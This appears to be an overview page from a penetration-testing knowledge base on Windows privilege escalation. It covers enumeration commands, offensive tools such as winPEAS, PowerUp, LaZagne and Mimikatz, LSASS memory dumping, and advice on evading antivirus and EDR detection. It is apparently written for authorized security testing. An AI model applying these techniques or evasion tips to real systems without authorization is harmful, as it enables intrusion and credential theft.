Skip to content
Codex Codex

Windows Privilege Escalation

T1078 Valid Accounts T1059.001 PowerShell T1068 Exploitation for Privilege Escalation T1134 PrivEsc AdminCompromise SystemCompromise

TL;DR

Section titled “TL;DR”

Windows privilege escalation is a loop: enumerate the local environment exhaustively, identify a misconfiguration or token/group privilege that maps to a known escalation primitive, exploit it, repeat if the new context isn’t yet your goal. The target hierarchy is NT AUTHORITY\SYSTEM (highest, ~“root-equivalent”), local Administrator, then domain-privileged accounts (Domain Admin, Enterprise Admin) reachable via stored credentials or token theft.

# 1. Situational awareness - where are we?
whoami /priv      whoami /groups      ipconfig /all     route print
systeminfo        wmic qfe            tasklist /svc     netstat -ano
net user          net localgroup      net localgroup administrators


# 2. Tool-driven enumeration - find what manual missed
.\winPEASx64.exe                    # comprehensive checks, very verbose
.\Seatbelt.exe -group=all           # focused, structured output
. .\PowerUp.ps1; Invoke-AllChecks   # PowerShell, classic
.\SharpUp.exe audit                 # PowerUp C# port
.\watson.exe                        # KB-based missing-patch matcher


# 3. Match findings to escalation primitives - by category
#    Token privileges  → SeImpersonate, SeDebug, SeBackup, SeRestore, SeTakeOwnership
#    Group memberships → Backup Operators, DnsAdmins, Hyper-V Admins, Server Operators
#    OS vulns          → Missing KBs, kernel exploits (PrintNightmare, HiveNightmare)
#    Misconfigurations → Weak service ACLs, unquoted paths, AlwaysInstallElevated
#    Cred hunting      → Config files, registry, browser stores, password managers

Success indicator: whoami returns nt authority\system or a member of BUILTIN\Administrators, or stored credentials yield a domain-privileged account.

The target account hierarchy

Section titled “The target account hierarchy”
AccountPrivilegesHow to recognizeWhat it unlocks
NT AUTHORITY\SYSTEMHighest; can read all process memory, all files, all registrywhoami returns nt authority\systemLocal Administrator hashes via mimikatz, cached credentials, any local file
Local AdministratorFull control of the local boxMember of BUILTIN\AdministratorsService installation, registry HKLM write, scheduled tasks as SYSTEM (one step from SYSTEM)
Other local adminSame as Local AdministratorOther account in BUILTIN\AdministratorsSame as above
Domain user, local adminLocal admin + domain identityDomain user in BUILTIN\AdministratorsLateral movement via PsExec, WMI, WinRM to other domain hosts
Domain Admin / Enterprise AdminFull control of ADMember of Domain Admins / Enterprise AdminsDomain compromise - DC access, NTDS.dit dump, all domain accounts

The progression isn’t strict. Often you land in a service account context (low-privileged but with SeImpersonate) and the easiest path is directly to SYSTEM via potato-family attacks - skipping over Administrator entirely.

Why SYSTEM is usually the goal

Section titled “Why SYSTEM is usually the goal”

SYSTEM is the “root-equivalent” account on Windows. It can:

  • Read any file regardless of ACL (including C:\Windows\System32\config\SAM and \SYSTEM - local credential hives)
  • Read process memory of any process including LSASS (which holds plaintext credentials and Kerberos tickets)
  • Modify any registry key
  • Install services
  • Impersonate any other logged-on user

Local Administrator can also do most of this with UAC consent, but SYSTEM skips UAC entirely. For automation and stealth, SYSTEM is preferred.

The enumeration → exploit loop

Section titled “The enumeration → exploit loop”

Privilege escalation isn’t a single technique - it’s a methodology applied iteratively. The loop:

┌─────────────────────────────────────────────────────────┐
│  1. Enumerate    (manual + tools)                       │
│     - System info, patches, installed software           │
│     - User privileges, group memberships                 │
│     - Services, scheduled tasks, file ACLs               │
│     - Network state, running processes, named pipes      │
├─────────────────────────────────────────────────────────┤
│  2. Identify     (pattern match against primitives)     │
│     - Token privilege? → potato-family or token abuse    │
│     - Group membership? → group-specific attack path     │
│     - Missing patch? → kernel exploit                    │
│     - Weak ACL? → service binary / registry / file       │
│     - Stored credentials? → reuse for higher context     │
├─────────────────────────────────────────────────────────┤
│  3. Exploit      (one primitive at a time)              │
│     - Verify the prerequisite holds                      │
│     - Test in lab first if non-destructive isn't certain │
│     - Document baseline → action → result                │
├─────────────────────────────────────────────────────────┤
│  4. Verify       (did the context change?)              │
│     - `whoami` to confirm new identity                   │
│     - If still low-priv, return to step 1                │
│     - If SYSTEM/admin, pivot to credential harvesting    │
└─────────────────────────────────────────────────────────┘

A typical engagement runs this loop 2-5 times: foothold → service account → SYSTEM. Or foothold → local admin via stored creds → domain user via lateral move → domain admin via Kerberoasting. The pattern repeats; the specific primitives change.

Tooling overview

Section titled “Tooling overview”

Manual enumeration is essential - tools fail, get blocked by AV, and sometimes return false positives - but running a script in 30 seconds beats running 50 commands in 20 minutes. Use both.

Comprehensive enumeration scanners

Section titled “Comprehensive enumeration scanners”
ToolLanguageFocusNotes
winPEAS.NET / batAll-around, very thoroughExtremely verbose; great as a “first pass”
SeatbeltC#Focused, structuredCleaner output than winPEAS; -group= flag for targeted runs
PowerUpPowerShellService / file / registry misconfigsClassic; Invoke-AllChecks covers most paths
SharpUpC#PowerUp portLess feature-complete than PowerUp; useful when PS is constrained
JAWSPowerShellPowerShell 2.0 compatibleFor very old Windows (Server 2008) where modern tools fail
Watson.NETMissing-KB → exploit matcherOutput: “you’re missing KBxxxxx, try CVE-yyyy”
Windows-Exploit-Suggester (WES-NG)PythonSame role, runs on the attacker sideFeed it systeminfo output
SherlockPowerShellMissing-KB matcher (older)Predates Watson; works on Win7/Server 2008

Credential extraction

Section titled “Credential extraction”
ToolPurpose
LaZagnePulls saved credentials from browsers, mail clients, wifi, DPAPI, etc.
SessionGopherSaved sessions: PuTTY, WinSCP, FileZilla, SuperPuTTY, RDP
SharpChromeChrome cookies and saved logins via DPAPI
MimikatzThe canonical credential dumper

Sysinternals essentials

Section titled “Sysinternals essentials”

Sysinternals Suite - Microsoft-signed, generally unflagged by AV:

BinaryPurpose
accesschkDACL inspection: services, named pipes, registry keys, files
pipelistNamed pipe enumeration
psserviceService info / control
procdumpProcess memory dumping (LSASS in particular)
procmonLive filesystem / registry / process monitoring
AutorunsPersistence-location enumeration

Pre-compiled binaries

Section titled “Pre-compiled binaries”

For each engagement, prefer compiling from source if possible to avoid AV signatures matching public binaries. When compilation isn’t an option, Ghostpack-CompiledBinaries hosts pre-built Seatbelt / SharpUp / Rubeus / etc.

Tool drop locations

Section titled “Tool drop locations”

When uploading tools to a target, C:\Windows\Temp\ is reliably writable by BUILTIN\Users and often missed by file-monitoring rules that focus on user profile paths. C:\ProgramData\ is another option. Avoid C:\Users\Public\ (often monitored) and never drop in your own profile if you have a domain account (the profile syncs).

AV / EDR considerations

Section titled “AV / EDR considerations”

The reality of modern Windows enterprises:

DefenseWhat it doesOperator impact
Windows Defender (default AV)Real-time signature scanning + cloud lookupsAlmost every public tool is signatured; rename + obfuscate to bypass
Microsoft Defender for Endpoint (EDR)Behavioral detection: process injection, LSASS access, named-pipe patternsLoud tools (mimikatz, procdump) trigger alerts
CrowdStrike Falcon / Cylance / SentinelOneBehavior + ML-based EDRPublic tooling almost certainly flagged
AppLockerWhitelisting: blocks unauthorized binariesConstrains where tools can run from
WDAC / Device GuardStronger AppLockerTougher to bypass
PowerShell Constrained Language ModeRestricts PS to a safe subsetMost attack scripts fail
AMSIInline script content scanningBlocks malicious scripts before execution

The escalation paths in this cluster largely work in a hardened environment when correctly executed - but the tool drops, binary executions, and PowerShell invocations may trip alerts. Operational considerations:

  • Use built-in commands first (whoami, netstat, sc, reg query) - they’re not signatured
  • Modify tools before use - change strings, function names, compile fresh
  • Prefer manual techniques when tool detections are too risky
  • Read AppLocker policies first (Get-AppLockerPolicy -Effective) before assuming you can run an .exe from C:\Windows\Temp\

When the engagement explicitly authorizes “loud” testing (configuration audit, not evasive red team), use the public tools directly. When evasion matters, expect to spend significant effort on tradecraft before any escalation primitive runs.

What this cluster covers

Section titled “What this cluster covers”
PageFocus
Situational awarenessNetwork/AV/AppLocker enumeration - orienting before action
Initial enumerationSystem info, patches, users/groups, processes, network state
Named pipesEnumerating IPC channels and the writable-pipe attack pattern
SeImpersonateToken abuse: JuicyPotato, PrintSpoofer, RoguePotato for service-account-to-SYSTEM
SeDebugPrivilegeLSASS memory dump + mimikatz, child-process inheritance
SeTakeOwnershipReading sensitive files via ownership-then-DACL-modify
Backup OperatorsSeBackup/SeRestore for NTDS.dit dump and registry hive extraction
DnsAdminsDNS plugin DLL injection on Domain Controllers
Other privileged groupsEvent Log Readers, Hyper-V Admins, Print Operators, Server Operators

Subsequent rounds will cover OS attacks (UAC bypass, weak service ACLs, kernel exploits, DLL injection), credential hunting (config files, registry, browsers, password managers), restricted environments (Citrix breakout, kiosks), and miscellaneous techniques (LOLBAS, AlwaysInstallElevated, scheduled task abuse, VHDX mounting, EOL system attacks).

Operational sequence

Section titled “Operational sequence”

For a standard “low-privileged shell, escalate to SYSTEM” task:

  1. Confirm context - whoami, whoami /priv, whoami /groups. Three lines tell you 80% of what’s possible.
  2. Quick-check privileged tokens - if any of SeImpersonate, SeAssignPrimaryToken, SeBackup, SeRestore, SeDebug, SeTakeOwnership, SeLoadDriver show up enabled, jump directly to that page in this cluster
  3. Group membership - whoami /groups and net localgroup. Any of Backup Operators, DnsAdmins, Hyper-V Administrators, Print Operators, Server Operators, or Event Log Readers: jump to the relevant page
  4. System version & patches - systeminfo → feed to WES-NG or run Watson locally. Match missing KBs to public exploits
  5. Service / file ACL audit - accesschk, winPEAS, PowerUp look for weak permissions
  6. Credential hunting - only if the above fail; covered in a later round

The order matters because each step is cheaper than the next. A whoami /priv check is one command and reveals JuicyPotato-style wins instantly; a full file-system credential hunt is hours of work and the lowest-value lookup.

Defenses D3-PM D3-LAM